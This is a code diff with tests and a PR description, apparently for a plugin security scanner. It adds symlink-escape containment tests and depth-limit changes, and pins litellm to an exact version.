+        link_path = os.path.join(self.plugin_dir, "src", "escape.js")
+        os.symlink(self.external_file, link_path)
+
+        escapes: list[str] = []
+        files = collect_files(self.plugin_dir, [".js"], _symlink_escapes=escapes)
+
+        basenames = [os.path.basename(f) for f in files]
+        self.assertNotIn("escape.js", basenames, "Symlinked file outside root must not be collected")
+        self.assertIn("index.js", basenames, "Legitimate file must still be collected")
+        self.assertEqual(len(escapes), 1)
+        self.assertIn("escape.js", escapes[0])
+
+    def test_file_symlink_within_root_is_collected(self):
+        """A .js file symlink that stays inside the plugin root should be included normally."""
+        internal_file = os.path.join(self.plugin_dir, "src", "util.js")
+        with open(internal_file, "w") as f:
+            f.write("// util")
+        link_path = os.path.join(self.plugin_dir, "src", "util_link.js")
+        os.symlink(internal_file, link_path)
+
+        escapes: list[str] = []
+        files = collect_files(self.plugin_dir, [".js"], _symlink_escapes=escapes)
+
+        basenames = [os.path.basename(f) for f in files]
+        self.assertIn("util.js", basenames)
+        self.assertEqual(len(escapes), 0, "Internal file symlink should not be flagged as escape")
 
 
 if __name__ == "__main__":

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -65,7 +65,7 @@ default-groups = ["dev"]
 override-dependencies = [
     "rich>=13.7.1,<14.0.0",
     "cryptography>=46.0.7",   # CVE-2026-39892 fixed in 46.0.7
-    "litellm>=1.83.0",        # CVE-2026-35029, CVE-2026-35030
+    "litellm==1.83.0",        # CVE-2026-35029, CVE-2026-35030
 ]
 
 [tool.ruff]

--- a/uv.lock
+++ b/uv.lock
@@ -15,7 +15,7 @@ resolution-markers = [
 [manifest]
 overrides = [
     { name = "cryptography", specifier = ">=46.0.7" },
-    { name = "litellm", specifier = ">=1.83.0" },
+    { name = "litellm", specifier = "==1.83.0" },
     { name = "rich", specifier = ">=13.7.1,<14.0.0" },
 ]
 


### PR DESCRIPTION
- collect_files(): 
-replace blanket dotdir skip with explicit blocklist so hidden dirs like .hidden/ are scanned while .git/.vscode are still skipped
- add symlink containment — skip and report symlinks that escape the plugin root, with inode-based cycle detection
- raise depth limit from 4 to 20 and record truncations so deeply nested malicious code is no longer invisible
- _load_manifest(): add openclaw.plugin.json to probe list so OpenClaw-only plugins get the full analyzer pipeline instead of short-circuiting
- scan_plugin(): continue scanning with synthetic manifest when no manifest exists, upgrading MANIFEST-MISSING to HIGH severity
- New findings: STRUCT-SYMLINK-ESCAPE (HIGH), SCAN-DEPTH-LIMIT (MEDIUM)
- 14 new tests covering all fixes